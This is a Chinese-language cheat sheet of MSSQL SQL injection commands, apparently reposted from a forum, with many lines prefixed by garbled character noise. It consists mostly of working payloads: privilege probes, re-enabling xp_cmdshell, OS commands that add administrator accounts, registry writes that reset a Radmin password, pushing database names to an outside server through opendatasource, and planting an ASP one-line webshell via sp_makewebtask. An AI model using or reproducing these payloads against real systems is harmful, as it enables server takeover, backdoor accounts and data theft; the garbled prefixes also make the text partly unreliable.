阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
6 r% d* K) r# Y$ e6 Aand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

! p( d- j8 _* G: k7 \8 v$ Z- z//检测是否有读取某数据库的权限
+ d, j" M0 e1 Z+ S8 Eand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
! X, N% c: M& k
/ k7 z- `' A3 ]  r; t
数字类型
and char(124)%2Buser%2Bchar(124)=0
8 o1 k/ Z/ a* ^/ n& k( A* k
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

% s  }) k$ n! k" Z$ B* E搜索类型
. Q: N# T  |# F0 t0 u1 g' and char(124)%2Buser%2Bchar(124)=0 and '%'='
* ^% M* c6 M5 E$ F5 d# r
7 w( @3 s; r1 }' w- }, M8 E爆用户名
- ^2 Y2 [7 w7 E3 j- p1 {( eand user>0
5 k0 a3 k# N. |1 |' and user>0 and ''='
- m' ]8 b6 A$ P* ^# V' G9 b/ L
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
. A& o. {# D. }& ~$ k6 gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

: h: ^2 \" z( i3 E检测是不是MSSQL数据库
" v9 w$ `3 ^- l$ y  g5 Hand exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

- ?& e' l+ w7 K! F+ o7 A恢复 xp_cmdshell
2 e" ^8 h$ C8 X$ e;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
# ], q# H3 p4 e4 p$ Q0 @2 G
* A/ }, ]+ F% x! q4 }' e7 O
( g2 i7 d1 n! _7 Bselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

0 T% _9 _; q, k0 Y7 A7 ~  E  c//-----------------------
7 e4 T+ k; K) b1 w2 a//      执行命令
//-----------------------
首先开启沙盘模式：
1 U' v; e2 E+ z( J/ nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

3 @! T& ]+ d5 H2 }& D然后利用jet.oledb执行系统命令
: Q! r, Z& N7 I6 M& t1 j- P; gselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

7 v- k3 P! A0 O; |1 T5 _& i执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

5 k: ?: l& n! P$ C9 [EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
1 @2 U, D& w1 K; s% v3 Z# p
判断xp_cmdshell扩展存储过程是否存在：
7 @7 a+ f7 n0 {( S$ ?' {+ x# R0 Fhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% ~2 }, l: p, ]+ {* m
写注册表
2 J+ d* g! C/ S0 }7 Lexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

; x; G. [7 O- ~* {REG_SZ

8 H7 {" _$ e; p9 f' G; {7 W0 z# A* s0 h读注册表
/ D' B. M% h# |  a+ l/ yexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
% k* Z8 I7 x( _, z2 j/ p) m
" P) Y* S* ~5 X* `3 q2 J读取目录内容
7 Z: {! t! E* Y8 ]" c8 m7 G* gexec master..xp_dirtree 'c:\winnt\system32\',1,1
# i* F) x7 U) K7 T, v
1 i! B5 L5 F1 s, k' X% c
: M) V8 Y5 M% }( Z1 S数据库备份
3 O& L7 `% u# |* @% @backup database pubs to disk = 'c:\123.bak'

//爆出长度
( v  ]' q* D2 Q! w& O3 EAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
5 @- W3 J, u/ }$ s, ?/ ^* u
$ E$ d8 [4 Y: R2 E% \6 R1 f
' S& h1 \% m# T
更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

8 T$ ~& W8 q( p* f0 n$ A添加和删除一个SA权限的用户test：
, ?  w( P  }5 p5 z, a# Aexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
  J" c+ Q4 I, M% j1 m
$ A7 R2 s/ o2 }( z( r删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
5 x$ N+ \; ?% ~: [3 W
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. P$ c  V) K, d7 S; nGRANT exec On xp_proxiedadata TO public
2 o3 M1 T/ ^' D9 Y
& P+ @& K2 g  q1 b& \" `
' w. z/ [" p' e% `2 t; F停掉或激活某个服务。
0 P3 d: Z. q: ^4 N6 U
/ E5 Y( H/ f' T* zexec master..xp_servicecontrol 'stop','schedule'
' g1 v" r, C% a1 s9 Bexec master..xp_servicecontrol 'start','schedule'
  l- w2 a5 C3 h1 J: z$ I' M
0 s( L; ^7 L: c4 A+ qdbo.xp_subdirs

只列某个目录下的子目录。
* d% [9 U0 \; G1 F' pxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 D4 ?' Y+ M; {. K& O# P# i0 S
dbo.xp_makecab

  \9 ~, S! C: o9 M9 G$ f: o0 u将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
' d: A5 T1 A3 L. M. X. ^, X+ Q'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

2 l( n2 D4 M) q, \! S- jxp_terminate_process
+ b& h# r) S5 A( A/ q2 V1 ~
+ g1 `' Q( Z  G( j& }' f停掉某个执行中的程序，但赋予的参数是 Process ID。
+ `4 @9 P: I6 w% z利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
5 R3 T! r% o9 L5 F' y4 m
' ~; Y& }2 l9 _  n! }xp_terminate_process 2484

* s* r7 v  {- M( Q( U& ]. H; ~xp_unpackcab

- O: x6 b3 n: u! B/ d解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* ?7 Y) S! e* ^
create database lcx;
1 i' k- p/ X$ W" ECreate TABLE ku(name nvarchar(256) null);
! C$ r; o  T2 o9 vCreate TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

7 g. C) i2 l7 \! E9 H" q7 s2 b
//在Master中创建表，看看权限怎样
% m) ^* C) H3 I4 s& u( g& x' \0 g2 ^Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

1 S; T2 _0 p/ Q2 A% H8 j用 sp_makewebtask直接在web目录里写入一句话马：
! |9 N# Y+ u8 h/ }( chttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
/ v/ @  j: z7 M! l
//删除内容
delete from table_name where Stockid = 3